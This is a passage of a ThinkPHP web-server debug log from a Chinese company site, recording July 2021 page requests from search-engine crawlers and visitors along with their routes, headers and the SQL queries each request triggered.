] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/139_html' => '', 'id' => '139', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 139 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 139 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T06:10:57+08:00 ] 106.11.154.54 GET /index/news/xwxq/id/178.html [ info ] www.kinsana.cn/index/news/xwxq/id/178.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,171.85kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/178_html' => '', 'id' => '178', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 178 LIMIT 1 [ RunTime:0.015625s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 178 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T06:24:28+08:00 ] 123.183.224.97 GET /index/news/xwxq/id/194.html [ info ] www.kinsana.cn/index/news/xwxq/id/194.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,174.49kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/194_html' => '', 'id' => '194', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 194 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 194 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T06:30:27+08:00 ] 113.31.114.242 GET / [ info ] www.kinsana.cn/ [运行时间:0.156250s][吞吐率:6.40req/s] [内存消耗:2,016.94kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept-language' => 'zh-CN,zh;q=0.9', 'cache-control' => 'no-cache', 'connection' => 'close', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T06:30:52+08:00 ] 185.191.171.25 GET /index/news/xwxq/id/104.html [ info ] xn--vhqsn14am88k.com/index/news/xwxq/id/104.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,168.88kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)', 'connection' => 'close', 'accept-encoding' => 'gzip,deflate', 'accept' => 'text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml, application/xhtml+xml', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/104_html' => '', 'id' => '104', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 104 LIMIT 1 [ RunTime:0.015625s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 104 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T06:35:53+08:00 ] 123.183.224.97 GET /index/news/xwxq/id/194.html [ info ] www.kinsana.cn/index/news/xwxq/id/194.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,174.49kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/194_html' => '', 'id' => '194', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.031250s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 194 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 194 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T07:05:14+08:00 ] 54.36.148.153 GET /index/news/hydtnews.html?page=5 [ info ] www.kinsana.cn/index/news/hydtnews.html?page=5 [运行时间:0.312500s][吞吐率:3.20req/s] [内存消耗:2,083.59kb] [文件加载:56] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'hydtnews', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'deflate, gzip, br', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/hydtnews_html' => '', 'page' => '5', ) [ info ] [ RUN ] app\index\controller\News->hydtnews[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\hydtnews.htm [ array ( 0 => 'newRes', 1 => 'page', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `news` WHERE `cate_id` = '2' AND `state` = '1' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 32,8 [ RunTime:0.140625s ] --------------------------------------------------------------- [ 2021-07-16T07:16:20+08:00 ] 123.125.186.20 GET /index/news/xwxq/id/132.html [ info ] www.kinsana.cn/index/news/xwxq/id/132.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,173.68kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36', 'upgrade-insecure-requests' => '1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/132_html' => '', 'id' => '132', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 132 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 132 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T07:28:58+08:00 ] 106.11.155.42 GET /index/news/xwxq/id/141.html [ info ] www.kinsana.cn/index/news/xwxq/id/141.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,171.08kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/141_html' => '', 'id' => '141', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 141 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 141 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T07:34:05+08:00 ] 49.7.21.71 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,015.91kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T07:36:32+08:00 ] 203.208.60.34 GET /index/product/cpxq.html?id=131 [ info ] www.kinsana.cn/index/product/cpxq.html?id=131 [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,011.78kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'cpxq', ), ) [ info ] [ HEADER ] array ( 'if-modified-since' => 'Thu, 15 Jul 2021 10:59:55 GMT', 'accept-encoding' => 'gzip, deflate, br', 'user-agent' => 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'from' => 'googlebot(at)googlebot.com', 'accept' => 'text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8', 'connection' => 'close', 'amp-cache-transform' => 'google;v="1..7"', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/product/cpxq_html' => '', 'id' => '131', ) [ info ] [ RUN ] app\index\controller\Product->cpxq[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\cpxq.htm [ array ( 0 => 'res', 1 => 'photoRes', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` `p` INNER JOIN `type` `t` ON `p`.`type_id`=`t`.`id` WHERE `p`.`id` = '131' LIMIT 1 [ RunTime:0.015625s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `goods_photo` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `goods_photo` WHERE `goods_id` = 131 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T07:50:19+08:00 ] 34.212.32.113 GET / [ info ] xn--vhqsn14am88k.com/ [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,015.91kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T07:52:27+08:00 ] 54.213.210.43 GET /favicon.ico [ info ] xn--vhqsn14am88k.com/favicon.ico [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:1,068.63kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'favicon.ico', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/favicon_ico' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T07:52:32+08:00 ] 54.213.210.43 GET / [ info ] xn--vhqsn14am88k.com/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,015.91kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T08:13:59+08:00 ] 118.184.177.36 GET /index/news/xwxq/id/11.html [ info ] www.kinsana.cn/index/news/xwxq/id/11.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,206.50kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/11_html' => '', 'id' => '11', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 11 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 11 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T08:23:29+08:00 ] 121.205.215.127 GET 